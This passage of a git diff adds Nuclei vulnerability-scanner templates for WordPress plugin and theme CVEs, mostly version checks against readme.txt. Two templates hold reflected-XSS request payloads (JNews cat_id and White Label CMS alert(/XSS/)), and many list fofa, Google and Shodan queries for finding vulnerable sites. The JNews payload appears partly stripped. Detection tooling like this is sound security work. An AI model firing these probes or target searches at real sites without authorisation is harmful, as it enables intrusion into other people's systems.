type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2021-24342-5715.yaml b/poc/cve/CVE-2021-24342-5715.yaml new file mode 100644 index 0000000000..ea8174ddb3 --- /dev/null +++ b/poc/cve/CVE-2021-24342-5715.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-24342 + +info: + name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS) + author: pikpikcu + severity: medium + description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue. + reference: + - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e + - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24342 + cwe-id: CWE-79 + +requests: + - raw: + - | + POST /?ajax-request=jnews HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2022-0422(1).yaml b/poc/cve/CVE-2022-0422(1).yaml new file mode 100644 index 0000000000..75d7077c97 --- /dev/null +++ b/poc/cve/CVE-2022-0422(1).yaml @@ -0,0 +1,63 @@ +id: CVE-2022-0422 + +info: + name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting + author: random-robbie + severity: medium + description: | + WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc + - https://plugins.trac.wordpress.org/changeset/2672615 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0422 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0422 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: videousermanuals + product: white_label_cms + framework: wordpress + tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals + +http: + - raw: + - | + POST /wp-login.php?wlcms-action=preview HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert(/XSS/);" + + - type: word + part: body + words: + - "wlcms-login-wrapper" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-10046.yaml b/poc/cve/CVE-2024-10046.yaml new file mode 100644 index 0000000000..2fcd3d1aef --- /dev/null +++ b/poc/cve/CVE-2024-10046.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10046 + +info: + name: > + افزونه پیامک ووکامرس Persian WooCommerce SMS <= 7.0.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The افزونه پیامک ووکامرس Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/175a69da-c47a-40f3-98c7-7cfcdf98f9f6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10046 + metadata: + fofa-query: "wp-content/plugins/persian-woocommerce-sms/" + google-query: inurl:"/wp-content/plugins/persian-woocommerce-sms/" + shodan-query: 'vuln:CVE-2024-10046' + tags: cve,wordpress,wp-plugin,persian-woocommerce-sms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/persian-woocommerce-sms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "persian-woocommerce-sms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.0.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11010.yaml b/poc/cve/CVE-2024-11010.yaml new file mode 100644 index 0000000000..3225f1d4d7 --- /dev/null +++ b/poc/cve/CVE-2024-11010.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11010 + +info: + name: > + FileOrganizer <= 1.1.4 - Authenticated (Administrator+) Local JavaScript File Inclusion + author: topscoder + severity: low + description: > + The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.4 via the 'default_lang' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e958653-36c4-4979-89e1-d9411a35a92a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-11010 + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:CVE-2024-11010' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11329.yaml b/poc/cve/CVE-2024-11329.yaml new file mode 100644 index 0000000000..35c4b2a80c --- /dev/null +++ b/poc/cve/CVE-2024-11329.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11329 + +info: + name: > + Comfino Payment Gateway <= 4.1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Comfino Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/006945a3-5f54-4bb8-9522-c832d59624a0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11329 + metadata: + fofa-query: "wp-content/plugins/comfino-payment-gateway/" + google-query: inurl:"/wp-content/plugins/comfino-payment-gateway/" + shodan-query: 'vuln:CVE-2024-11329' + tags: cve,wordpress,wp-plugin,comfino-payment-gateway,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/comfino-payment-gateway/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "comfino-payment-gateway" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11353.yaml b/poc/cve/CVE-2024-11353.yaml new file mode 100644 index 0000000000..e750a8aecb --- /dev/null +++ b/poc/cve/CVE-2024-11353.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11353 + +info: + name: > + SMS for Lead Capture Forms <= 1.1.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Message Deletion + author: topscoder + severity: low + description: > + The SMS for Lead Capture Forms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_message() function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary messages. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c68bb6-77a2-4232-923a-37f2c0327743?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-11353 + metadata: + fofa-query: "wp-content/plugins/clicksend-lead-capture-form/" + google-query: inurl:"/wp-content/plugins/clicksend-lead-capture-form/" + shodan-query: 'vuln:CVE-2024-11353' + tags: cve,wordpress,wp-plugin,clicksend-lead-capture-form,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clicksend-lead-capture-form/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clicksend-lead-capture-form" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11367.yaml b/poc/cve/CVE-2024-11367.yaml new file mode 100644 index 0000000000..5392835e28 --- /dev/null +++ b/poc/cve/CVE-2024-11367.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11367 + +info: + name: > + Smoove connector for Elementor forms <= 4.1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11367 + metadata: + fofa-query: "wp-content/plugins/smoove-elementor/" + google-query: inurl:"/wp-content/plugins/smoove-elementor/" + shodan-query: 'vuln:CVE-2024-11367' + tags: cve,wordpress,wp-plugin,smoove-elementor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smoove-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smoove-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11374.yaml b/poc/cve/CVE-2024-11374.yaml new file mode 100644 index 0000000000..b9164a82ab --- /dev/null +++ b/poc/cve/CVE-2024-11374.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11374 + +info: + name: > + TWChat – Send or receive messages from users <= 4.0.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The TWChat – Send or receive messages from users plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb047d0-0056-432c-bae3-3ab926e39bcd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11374 + metadata: + fofa-query: "wp-content/plugins/twchat/" + google-query: inurl:"/wp-content/plugins/twchat/" + shodan-query: 'vuln:CVE-2024-11374' + tags: cve,wordpress,wp-plugin,twchat,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twchat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twchat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11380.yaml b/poc/cve/CVE-2024-11380.yaml new file mode 100644 index 0000000000..9ba199bd46 --- /dev/null +++ b/poc/cve/CVE-2024-11380.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11380 + +info: + name: > + Mini Program API <= 1.4.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Mini Program API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'qvideo' shortcode in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a0b9499b-3017-46a6-80d5-104d203b77f0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11380 + metadata: + fofa-query: "wp-content/plugins/wp-mini-program/" + google-query: inurl:"/wp-content/plugins/wp-mini-program/" + shodan-query: 'vuln:CVE-2024-11380' + tags: cve,wordpress,wp-plugin,wp-mini-program,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-mini-program/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-mini-program" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11436.yaml b/poc/cve/CVE-2024-11436.yaml new file mode 100644 index 0000000000..57574432fe --- /dev/null +++ b/poc/cve/CVE-2024-11436.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11436 + +info: + name: > + Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! <= 1.4.19 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.4.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/125a1d8d-8cd9-439c-b765-198ad369f987?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11436 + metadata: + fofa-query: "wp-content/plugins/pie-forms-for-wp/" + google-query: inurl:"/wp-content/plugins/pie-forms-for-wp/" + shodan-query: 'vuln:CVE-2024-11436' + tags: cve,wordpress,wp-plugin,pie-forms-for-wp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pie-forms-for-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pie-forms-for-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.19') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11451.yaml b/poc/cve/CVE-2024-11451.yaml new file mode 100644 index 0000000000..0353789fd9 --- /dev/null +++ b/poc/cve/CVE-2024-11451.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11451 + +info: + name: > + Zooom <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Zooom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zooom' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6bd15878-a290-4613-83d9-011d60bb0233?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11451 + metadata: + fofa-query: "wp-content/plugins/zooom/" + google-query: inurl:"/wp-content/plugins/zooom/" + shodan-query: 'vuln:CVE-2024-11451' + tags: cve,wordpress,wp-plugin,zooom,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zooom/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zooom" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11457.yaml b/poc/cve/CVE-2024-11457.yaml new file mode 100644 index 0000000000..f359830428 --- /dev/null +++ b/poc/cve/CVE-2024-11457.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11457 + +info: + name: > + Feedpress Generator – External RSS Frontend Customizer <= 1.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Feedpress Generator – External RSS Frontend Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f9660aee-1069-4197-b166-12ea30f8fd0c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11457 + metadata: + fofa-query: "wp-content/plugins/feedpress-generator/" + google-query: inurl:"/wp-content/plugins/feedpress-generator/" + shodan-query: 'vuln:CVE-2024-11457' + tags: cve,wordpress,wp-plugin,feedpress-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/feedpress-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "feedpress-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11464.yaml b/poc/cve/CVE-2024-11464.yaml new file mode 100644 index 0000000000..130aad6147 --- /dev/null +++ b/poc/cve/CVE-2024-11464.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11464 + +info: + name: > + Easy Code Snippets <= 1.0.2 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Easy Code Snippets plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/31f5ddbf-2014-40e7-881d-27148bf133ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11464 + metadata: + fofa-query: "wp-content/plugins/easy-code-snippets/" + google-query: inurl:"/wp-content/plugins/easy-code-snippets/" + shodan-query: 'vuln:CVE-2024-11464' + tags: cve,wordpress,wp-plugin,easy-code-snippets,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-code-snippets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-code-snippets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11501.yaml b/poc/cve/CVE-2024-11501.yaml new file mode 100644 index 0000000000..775244fb3f --- /dev/null +++ b/poc/cve/CVE-2024-11501.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11501 + +info: + name: > + Gallery <= 1.3 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3 via deserialization of untrusted input from wd_gallery_$id parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/778f7d9b-6376-4026-a291-1fedeabe8c99?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-11501 + metadata: + fofa-query: "wp-content/plugins/multi-gallery/" + google-query: inurl:"/wp-content/plugins/multi-gallery/" + shodan-query: 'vuln:CVE-2024-11501' + tags: cve,wordpress,wp-plugin,multi-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/multi-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "multi-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11904.yaml b/poc/cve/CVE-2024-11904.yaml new file mode 100644 index 0000000000..1bf3f48b8c --- /dev/null +++ b/poc/cve/CVE-2024-11904.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11904 + +info: + name: > + 코드엠샵 소셜톡 <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The 코드엠샵 소셜톡 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'msntt_add_plus_talk' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e501b31-a7f4-4d0d-bf83-af7b6c023a6b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11904 + metadata: + fofa-query: "wp-content/plugins/mshop-naver-talktalk/" + google-query: inurl:"/wp-content/plugins/mshop-naver-talktalk/" + shodan-query: 'vuln:CVE-2024-11904' + tags: cve,wordpress,wp-plugin,mshop-naver-talktalk,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mshop-naver-talktalk/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mshop-naver-talktalk" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11943.yaml b/poc/cve/CVE-2024-11943.yaml new file mode 100644 index 0000000000..17337631a7 --- /dev/null +++ b/poc/cve/CVE-2024-11943.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11943 + +info: + name: > + 워드프레스 결제 심플페이 – 우커머스 결제 플러그인 <= 5.2.2 - Reflected Cross-Site Scripting via add_query_arg Parameter + author: topscoder + severity: medium + description: > + The 워드프레스 결제 심플페이 – 우커머스 결제 플러그인 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.2.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d85d609-781b-4f82-af57-124767f9d333?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11943 + metadata: + fofa-query: "wp-content/plugins/pgall-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/pgall-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-11943' + tags: cve,wordpress,wp-plugin,pgall-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pgall-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pgall-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12026.yaml b/poc/cve/CVE-2024-12026.yaml new file mode 100644 index 0000000000..8f75c79368 --- /dev/null +++ b/poc/cve/CVE-2024-12026.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12026 + +info: + name: > + Message Filter for Contact Form 7 <= 1.6.3 - Missing Authorization to Authenticated (Subscriber+) New Filter Creation + author: topscoder + severity: low + description: > + The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveFilter() function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new filters. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7044aa-a1e7-4b1d-9f50-5e250426c6b0?source=api-prod + classification: + cvss-metrics: 